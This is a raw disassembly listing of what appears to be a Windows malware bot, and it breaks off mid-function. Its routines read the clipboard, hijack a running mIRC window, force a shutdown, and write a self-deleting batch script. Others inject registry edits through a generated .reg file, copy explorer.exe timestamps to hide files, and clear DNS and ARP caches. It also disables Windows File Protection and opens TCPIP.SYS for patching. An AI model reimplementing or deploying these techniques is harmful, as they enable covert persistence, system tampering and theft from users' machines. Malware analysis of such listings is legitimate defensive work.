xor esi, esi
cmp edi, esi
jz short loc_40A7D7
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40A7D7
cmp [ebp+arg_8], esi
jz short loc_40A7D7
cmp byte ptr [eax], 0
jz short loc_40A7D7
push ebx
push edi
call sub_4203A3
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40A7D2
push [ebp+arg_4]
push edi
call sub_417980
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40A7CB
sub eax, edi
push eax
push edi
push ebx
call sub_4182F0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_417AF0
push eax
push [ebp+arg_8]
push ebx
call sub_4184C0
push [ebp+arg_4]
call sub_417AF0
add eax, esi
push eax
push ebx
call sub_417A10
push ebx
push edi
call sub_417A00
add esp, 30h
mov esi, edi
loc_40A7CB: ; CODE XREF: sub_40A74C+3C�j
push ebx
call sub_417C62
pop ecx
loc_40A7D2: ; CODE XREF: sub_40A74C+2B�j
mov eax, esi
pop ebx
jmp short loc_40A7D9
; ---------------------------------------------------------------------------
loc_40A7D7: ; CODE XREF: sub_40A74C+C�j
; sub_40A74C+13�j ...
xor eax, eax
loc_40A7D9: ; CODE XREF: sub_40A74C+89�j
pop edi
pop esi
pop ebp
retn
sub_40A74C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7DD proc near ; CODE XREF: sub_40F576+EC�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_417430
mov esi, [ebp+arg_0]
push esi
call sub_417AF0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_40A813
or eax, 0FFFFFFFFh
jmp short loc_40A886
; ---------------------------------------------------------------------------
loc_40A813: ; CODE XREF: sub_40A7DD+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_40A835
loc_40A81F: ; CODE XREF: sub_40A7DD+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_40A82C
cmp dl, 0Dh
jnz short loc_40A830
loc_40A82C: ; CODE XREF: sub_40A7DD+48�j
and byte ptr [ecx+esi], 0
loc_40A830: ; CODE XREF: sub_40A7DD+4D�j
inc ecx
cmp ecx, eax
jl short loc_40A81F
loc_40A835: ; CODE XREF: sub_40A7DD+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_40A866
lea edi, [ebp+var_7CC]
loc_40A842: ; CODE XREF: sub_40A7DD+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_40A861
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_40A861
cmp ebx, 1F4h
jge short loc_40A866
mov [edi], ecx
inc ebx
add edi, 4
loc_40A861: ; CODE XREF: sub_40A7DD+69�j
; sub_40A7DD+74�j
inc edx
cmp edx, eax
jl short loc_40A842
loc_40A866: ; CODE XREF: sub_40A7DD+5D�j
; sub_40A7DD+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_40A884
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_417490
add esp, 0Ch
loc_40A884: ; CODE XREF: sub_40A7DD+8E�j
mov eax, ebx
loc_40A886: ; CODE XREF: sub_40A7DD+34�j
pop esi
pop ebx
leave
retn
sub_40A7DD endp
; =============== S U B R O U T I N E =======================================
sub_40A88A proc near ; CODE XREF: sub_40A8E4+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
loc_40A899: ; DATA XREF: ___:004258FC�o
; ___:00425940�o ...
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_40A8C3
push ebx
mov ebx, edi
loc_40A8A7: ; CODE XREF: sub_40A88A+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_40A8C6
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40A8A7
pop ebx
loc_40A8C3: ; CODE XREF: sub_40A88A+18�j
pop edi
pop esi
retn
sub_40A88A endp
; =============== S U B R O U T I N E =======================================
sub_40A8C6 proc near ; CODE XREF: sub_40A88A+25�p
; sub_40A8E4+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_4187E1
cmp al, 61h
pop ecx
jl short loc_40A8E1
cmp al, 7Ah
jg short loc_40A8E1
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_40A8E1: ; CODE XREF: sub_40A8C6+E�j
; sub_40A8C6+12�j
xor eax, eax
retn
sub_40A8C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8E4 proc near ; CODE XREF: sub_40C5D7+10�p
; sub_40C609+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_417B70
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_417AF0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_417AF0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_40A88A
add esp, 14h
dec esi
mov edi, esi
loc_40A922: ; CODE XREF: sub_40A8E4+B6�j
test esi, esi
jle short loc_40A9A0
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4187E1
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_4187E1
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40A998
loc_40A948: ; CODE XREF: sub_40A8E4+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_40A8C6
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40A969
mov eax, ecx
loc_40A969: ; CODE XREF: sub_40A8E4+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40A99C
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4187E1
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_4187E1
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_40A948
loc_40A998: ; CODE XREF: sub_40A8E4+62�j
dec edi
dec esi
jmp short loc_40A922
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8E4+8A�j
xor eax, eax
jmp short loc_40A9A5
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8E4+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_40A9A5: ; CODE XREF: sub_40A8E4+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A8E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9AA proc near ; CODE XREF: sub_40F6F1+3D85�p
; sub_40F6F1+4D5D�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
nop
call near ptr 7C910331h
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
nop
call near ptr 7C82F7A0h
lea eax, [ebp+var_100]
loc_40A9E3: ; CODE XREF: sub_40A9AA+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40A9EF
cmp cl, 9
jnz short loc_40A9F2
loc_40A9EF: ; CODE XREF: sub_40A9AA+3E�j
inc eax
jmp short loc_40A9E3
; ---------------------------------------------------------------------------
loc_40A9F2: ; CODE XREF: sub_40A9AA+43�j
; sub_40A9AA+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40AA0C
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40A9F2
cmp cl, 21h
jl short loc_40A9F2
loc_40AA0C: ; CODE XREF: sub_40A9AA+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_4414E8
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41792A
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40A9AA endp
; =============== S U B R O U T I N E =======================================
sub_40AA34 proc near ; CODE XREF: sub_40F6F1+586E�p
push esi
push 0
call dword_441388 ; OpenClipboard
test eax, eax
jz short loc_40AA6B
push 1
call dword_4413A8 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40AA6B
push edi
push esi
nop
call near ptr 7C80FF19h
push esi
mov edi, eax
nop
call near ptr 7C80FE82h
call dword_44140C ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40AA6B: ; CODE XREF: sub_40AA34+B�j
; sub_40AA34+19�j
xor eax, eax
pop esi
retn
sub_40AA34 endp
; =============== S U B R O U T I N E =======================================
sub_40AA6F proc near ; CODE XREF: sub_40F6F1+4B4D�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc ; "mIRC"
push esi
push edi
call dword_4413C4 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40AAEB
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
nop
call near ptr 7C80945Ch
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
nop
call near ptr 7C80B905h
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_4173AC
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_441414 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_441414 ; SendMessageA
push ebx
nop
call near ptr 7C80B974h
push edi
nop
call near ptr 7C809B47h
push 1
pop eax
pop ebx
jmp short loc_40AAED
; ---------------------------------------------------------------------------
loc_40AAEB: ; CODE XREF: sub_40AA6F+16�j
xor eax, eax
loc_40AAED: ; CODE XREF: sub_40AA6F+7A�j
pop edi
pop esi
pop ebp
retn
sub_40AA6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAF1 proc near ; CODE XREF: ___:0040EE50�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_441474 ; SearchPathA
test eax, eax
jz short loc_40AB90
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, dword_421088
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40AB90
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
nop
call near ptr 7C831C45h
push ebx
mov ebx, dword_42107C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40AB90
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
nop
call near ptr 7C831CB8h
push esi
call ebx ; CloseHandle
loc_40AB90: ; CODE XREF: sub_40AAF1+2A�j
; sub_40AAF1+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40AAF1 endp
; =============== S U B R O U T I N E =======================================
sub_40AB95 proc near ; CODE XREF: sub_40F6F1+1401�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_415B28
pop ecx
pop ecx
push 50005h
push 6
call dword_441300 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_40AB95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ABB7 proc near ; CODE XREF: sub_40D091+472�p
; sub_40F6F1+5B03�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_42ECF4, esi
push edi
jz short loc_40ABDB
cmp dword_441488, esi
jnz short loc_40ABDB
push esi
call sub_40C738
pop ecx
loc_40ABDB: ; CODE XREF: sub_40ABB7+13�j
; sub_40ABB7+1B�j
call sub_417021
lea eax, [ebp+var_764]
push eax
push 400h
nop
call near ptr 7C835DCAh
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_4173AC
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
nop
call near ptr 7C801A24h
mov edi, eax
cmp edi, esi
jbe loc_40AD3B
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_4173AC
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
nop
call near ptr 7C810D87h
push edi
nop
call near ptr 7C809B47h
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417430
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_417430
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43C63C
mov [ebp+var_2C], 1
mov [ebp+var_28], si
nop
call near ptr 7C80B6A1h
push eax
nop
call near ptr 7C80B4CFh
lea eax, [ebp+var_15C]
push eax
nop
call near ptr 7C81153Ch
cmp eax, 0FFFFFFFFh
jz short loc_40ACE3
lea eax, [ebp+var_15C]
push 80h
push eax
nop
call near ptr 7C812782h
loc_40ACE3: ; CODE XREF: sub_40ABB7+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_4173AC
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
nop
call near ptr 7C8329D9h
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
nop
call near ptr 7C802367h
loc_40AD3B: ; CODE XREF: sub_40ABB7+72�j
pop edi
pop esi
leave
retn
sub_40ABB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD3F proc near ; CODE XREF: ___:0040EC5F�p
var_1860 = byte ptr -1860h
var_158 = byte ptr -158h
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 1860h
call sub_417B70
push esi
push edi
mov ecx, 5C1h
mov esi, offset a@echoOffEchoRe ; "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"...
lea edi, [ebp+var_1860]
lea eax, [ebp+var_158]
rep movsd
movsw
push offset aCA_bat ; "c:\\a.bat"
push eax
movsb
call sub_4173AC
pop ecx
xor esi, esi
pop ecx
lea eax, [ebp+var_158]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
nop
call near ptr 7C801A24h
mov edi, eax
cmp edi, esi
jbe short loc_40ADF9
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_1860]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1860]
push eax
push edi
nop
call near ptr 7C810D87h
push edi
nop
call near ptr 7C809B47h
push 44h
lea eax, [ebp+var_48]
pop edi
push edi
push esi
push eax
call sub_417430
add esp, 0Ch
lea ecx, [ebp+var_58]
mov [ebp+var_48], edi
mov [ebp+var_18], si
push 1
pop eax
push ecx
lea ecx, [ebp+var_48]
push ecx
push esi
push esi
push 28h
mov [ebp+var_1C], eax
push eax
push esi
lea eax, [ebp+var_158]
push esi
push eax
push esi
nop
call near ptr 7C802367h
loc_40ADF9: ; CODE XREF: sub_40AD3F+55�j
pop edi
pop esi
leave
retn
sub_40AD3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADFD proc near ; CODE XREF: ___:0041612A�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push esi
push edi
jz loc_40AE8F
push offset byte_43C63C
push [ebp+arg_0]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40AE8F
push 20h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_4182F0
mov esi, offset a_ ; "."
lea eax, [ebp+var_20]
push esi
push eax
call sub_41824D
add esp, 14h
test eax, eax
jz short loc_40AE8F
push eax
call sub_41791F
push esi
push 0
mov edi, eax
call sub_41824D
add esp, 0Ch
test eax, eax
jz short loc_40AE8F
push eax
call sub_41791F
cmp edi, 0Ah
pop ecx
jz short loc_40AE8A
cmp edi, 0ACh
jnz short loc_40AE7B
cmp eax, 0Fh
jle short loc_40AE8F
cmp eax, 20h
jl short loc_40AE8A
loc_40AE7B: ; CODE XREF: sub_40ADFD+72�j
cmp edi, 0C0h
jnz short loc_40AE8F
cmp eax, 0A8h
jnz short loc_40AE8F
loc_40AE8A: ; CODE XREF: sub_40ADFD+6A�j
; sub_40ADFD+7C�j
push 1
pop eax
jmp short loc_40AE91
; ---------------------------------------------------------------------------
loc_40AE8F: ; CODE XREF: sub_40ADFD+C�j
; sub_40ADFD+23�j ...
xor eax, eax
loc_40AE91: ; CODE XREF: sub_40ADFD+90�j
pop edi
pop esi
leave
retn
sub_40ADFD endp
; =============== S U B R O U T I N E =======================================
sub_40AE95 proc near ; CODE XREF: sub_4013E9+7�p
; sub_40198C+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40AEBD
push [esp+arg_0]
call dword_44143C ; gethostbyname
test eax, eax
jnz short loc_40AEB6
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AEB6: ; CODE XREF: sub_40AE95+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40AEBD: ; CODE XREF: sub_40AE95+D�j
retn
sub_40AE95 endp
; =============== S U B R O U T I N E =======================================
sub_40AEBE proc near ; CODE XREF: sub_40F326+9B�p
mov ecx, dword_4412E0
xor eax, eax
test ecx, ecx
jz short locret_40AECC
call ecx ; DnsFlushResolverCache
locret_40AECC: ; CODE XREF: sub_40AEBE+A�j
retn
sub_40AEBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AECD proc near ; CODE XREF: sub_40F6F1:loc_414F13�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_441434 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AF93
sub ecx, 32h
jz loc_40AF8C
sub ecx, 48h
jz short loc_40AF2D
sub ecx, 6Eh
jz short loc_40AF26
loc_40AF0F: ; CODE XREF: sub_40AECD+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_42D0F0
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_40AF6D
; ---------------------------------------------------------------------------
loc_40AF26: ; CODE XREF: sub_40AECD+40�j
push offset unk_42D0BC
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF2D: ; CODE XREF: sub_40AECD+3B�j
push [ebp+var_8]
call sub_417BEE
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_417430
add esp, 10h
cmp esi, edi
jz short loc_40AF5A
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_441434 ; GetIpNetTable
cmp eax, edi
jz short loc_40AF93
jmp short loc_40AF0F
; ---------------------------------------------------------------------------
loc_40AF5A: ; CODE XREF: sub_40AECD+79�j
push offset unk_42D07C
loc_40AF5F: ; CODE XREF: sub_40AECD+5E�j
; sub_40AECD+C4�j
lea eax, [ebp+var_88]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_40AF6D: ; CODE XREF: sub_40AECD+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40C4F7
pop ecx
loc_40AF7D: ; CODE XREF: sub_40AECD+C8�j
; sub_40AECD+DC�j
push esi
call sub_417C62
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AF8C: ; CODE XREF: sub_40AECD+32�j
push offset unk_42D03C
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF93: ; CODE XREF: sub_40AECD+29�j
; sub_40AECD+89�j
cmp [esi], edi
jbe short loc_40AF7D
lea ebx, [esi+4]
loc_40AF9A: ; CODE XREF: sub_40AECD+DA�j
push ebx
call dword_441430 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AF9A
jmp short loc_40AF7D
sub_40AECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFAB proc near ; CODE XREF: sub_401447+243�p
; sub_401D79+268�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_44135C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_4416EC
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_4173AC
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AFAB endp
; =============== S U B R O U T I N E =======================================
sub_40B004 proc near ; CODE XREF: sub_4010B2+24C�p
; sub_4010B2+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40B02D
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40B020: ; CODE XREF: sub_40B004+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40B020
pop edi
jmp short loc_40B031
; ---------------------------------------------------------------------------
loc_40B02D: ; CODE XREF: sub_40B004+A�j
mov edx, [esp+4+arg_0]
loc_40B031: ; CODE XREF: sub_40B004+27�j
test esi, esi
pop esi
jz short loc_40B03B
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40B03B: ; CODE XREF: sub_40B004+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40B004 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B051 proc near ; CODE XREF: sub_40F326+10D�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_80 = byte ptr -80h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
nop
call near ptr 7C812ADEh
cmp [ebp+var_90], 5
jnz short loc_40B09C
cmp [ebp+var_8C], 1
jnz short loc_40B09C
lea eax, [ebp+var_80]
push offset a2 ; "2"
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_40B09C
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B09C: ; CODE XREF: sub_40B051+27�j
; sub_40B051+30�j ...
xor eax, eax
leave
retn
sub_40B051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0A0 proc near ; CODE XREF: sub_40B0E7+A1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+var_200]
push 100h
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
nop
call near ptr 7C809BF8h
push offset aSfc_os_dll ; "sfc_os.dll"
nop
call near ptr 7C801D77h
push 5
push eax
nop
call near ptr 7C80ADA0h
lea ecx, [ebp+var_200]
push 0FFFFFFFFh
push ecx
push 0
call eax
leave
retn
sub_40B0A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0E7 proc near
var_3B0 = dword ptr -3B0h
var_3A0 = byte ptr -3A0h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = byte ptr -198h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 46h
mov esi, eax
pop ecx
lea edi, [ebp+var_1A0]
rep movsd
push 1
mov edx, offset dword_42D1A4
pop esi
mov ecx, offset dword_42D1A0
mov [eax+114h], esi
mov eax, offset dword_441700
xor ebx, ebx
push esi
mov [ebp+var_50], offset dword_42D19C
mov [ebp+var_4C], offset dword_42D198
mov [ebp+var_48], offset dword_42D194
mov [ebp+var_44], eax
mov [ebp+var_40], edx
mov [ebp+var_3C], ecx
mov [ebp+var_38], eax
mov [ebp+var_34], eax
mov [ebp+var_70], offset dword_42D190
mov [ebp+var_6C], offset dword_42D18C
mov [ebp+var_68], offset dword_42D188
mov [ebp+var_64], eax
mov [ebp+var_60], edx
mov [ebp+var_5C], ecx
mov [ebp+var_58], eax
mov [ebp+var_54], eax
mov [ebp+var_8], ebx
call sub_417BEE
mov [ebp+var_C], eax
mov [ebp+var_10], ebx
mov [esp+3B0h+var_3B0], 7530h
nop
call near ptr 7C802442h
lea eax, [ebp+var_198]
push eax
call sub_40B0A0
pop ecx
mov edi, 80h
lea eax, [ebp+var_198]
push edi
push eax
nop
call near ptr 7C812782h
push ebx
push edi
push 3
push ebx
push esi
lea eax, [ebp+var_198]
push 80000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40B1E0
lea ecx, [ebp+var_80]
push ecx
lea ecx, [ebp+var_78]
push ecx
lea ecx, [ebp+var_88]
push ecx
push eax
nop
call near ptr 7C831C45h
push [ebp+arg_0]
nop
call near ptr 7C809B47h
loc_40B1E0: ; CODE XREF: sub_40B0E7+D8�j
lea eax, [ebp+var_198]
push offset aRB ; "r+b"
push eax
call sub_41823A
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40B237
push [ebp+var_94]
lea eax, [ebp+var_3A0]
push offset aCanNotOpenTcpi ; "Can not open TCPIP.SYS, version %d."
push 200h
push eax
call sub_41792A
lea eax, [ebp+var_3A0]
push eax
call sub_40C4F7
push [ebp+var_19C]
call sub_417174
add esp, 18h
push ebx
nop
call near ptr 7C80C058h
loc_40B237: ; CODE XREF: sub_40B0E7+111�j
mov eax, [ebp+var_94]
dec eax
jz loc_40B300
dec eax
jnz loc_40B3AE
mov [ebp+var_30], 130h
mov [ebp+var_2C], 131h
mov [ebp+var_28], 132h
mov [ebp+var_24], 133h
mov [ebp+var_20], 4F5A2h
mov [ebp+var_1C], 4F5A3h
mov [ebp+var_18], 4F5A4h
mov [ebp+var_14], 4F5A5h
mov [ebp+var_4], ebx
loc_40B286: ; CODE XREF: sub_40B0E7+1DE�j
mov eax, [ebp+var_4]
push ebx
